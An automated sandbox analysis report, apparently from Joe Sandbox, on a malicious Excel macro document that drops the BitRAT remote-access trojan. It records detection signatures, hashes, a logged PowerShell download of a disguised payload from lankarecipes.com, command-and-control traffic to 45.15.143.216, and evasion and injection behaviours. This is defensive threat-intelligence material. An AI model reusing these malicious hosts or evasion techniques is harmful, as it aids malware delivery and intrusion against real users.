Analysis Report Scanned_25526662-Payment.xls

Overview

General Information

Sample Name: Scanned_25526662-Payment.xls
Analysis ID: 337288
MD5: cd7d4543958945e3fab4f0631e3494f3
SHA1: 3e00f26ab9384c9c1bb24eeb2de331f751f536ed
SHA256: b7a919bb30c1633483399356aedf42c11656c8a076be969e85b57ccdd071b879
Tags: BitRATRATStratoxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0 BitRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected BitRAT
Contains functionality to create processes via WMI
Contains functionality to hide a thread from the debugger
Creates processes via WMI
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Hides threads from debuggers
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sleep loop found (likely to delay execution)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Avira: detection malicious, Label: TR/Dropper.Gen
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Test1.txt ReversingLabs: Detection: 36%
Multi AV Scanner detection for submitted file
Source: Scanned_25526662-Payment.xls Virustotal: Detection: 14% Perma Link
Source: Scanned_25526662-Payment.xls ReversingLabs: Detection: 15%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Test1.txt Joe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_00426ED0 __vbaAryLock,__vbaAryUnlock,#644,#644,__vbaStrCat,__vbaStrMove,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,#644,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,#644,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStr,#644,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStr, 27_2_00426ED0
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_00426B80 __vbaAryLock,__vbaAryUnlock,__vbaAryLock,__vbaStrVarCopy,__vbaStrMove,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaVarMove,__vbaVarMove,__vbaVarMove,#644,__vbaVarMove,__vbaErase,__vbaLenBstrB,CryptHashData,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaVarZero,__vbaVarMove,#644,__vbaVarMove,__vbaErase,__vbaAryLock,__vbaAryLock,CryptDecrypt,__vbaAryUnlock,__vbaRedimPreserve,__vbaFreeStr, 27_2_00426B80
Source: Test3.jpg, 0000001B.00000002.361415384.00000000030E0000.00000040.00000001.sdmp Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_00426F7A GetFullPathNameW,FindFirstFileExW,GetLastError, 29_2_00426F7A

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\cmd.exe Jump to behavior
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: lankarecipes.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.3:49731 -> 192.185.236.165:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.3:49731 -> 192.185.236.165:80

Networking:

barindex
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49734 -> 45.15.143.216:5210
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /Sparc.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: lankarecipes.comConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: unknown TCP traffic detected without corresponding DNS query: 45.15.143.216
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_00415B0A WSARecv, 29_2_00415B0A
Source: global traffic HTTP traffic detected: GET /Sparc.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: lankarecipes.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: lankarecipes.com
Source: PowerShell_transcript.648351.+jaH7BR7.20210108094000.txt.3.dr String found in binary or memory: http://lankarecipes.com/Sparc.jp
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.cortana.ai
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.office.net
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.onedrive.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://augloop.office.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://cdn.entity.
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://cortana.ai
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://cortana.ai/api
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://cr.office.com
Source: Test3.jpg, Test3.jpg, 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://dev.cortana.ai
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://directory.services.
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://graph.windows.net
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://graph.windows.net/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://lifecycle.office.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://login.windows.local
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://management.azure.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://management.azure.com/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://messaging.office.com/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://ncus-000.contentsync.
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://ncus-000.pagecontentsync.
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://officeapps.live.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://onedrive.live.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://outlook.office.com/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://outlook.office365.com/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://settings.outlook.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://staging.cortana.ai
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://store.office.com/addinstemplate
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://tasks.office.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://templatelogging.office.com/client/log
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://wus2-000.contentsync.
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://wus2-000.pagecontentsync.
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr String found in binary or memory: https://www.odwebp.svc.ms

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Installs a global mouse hook
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Windows user hook set: 0 mouse low level NULL Jump to behavior

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
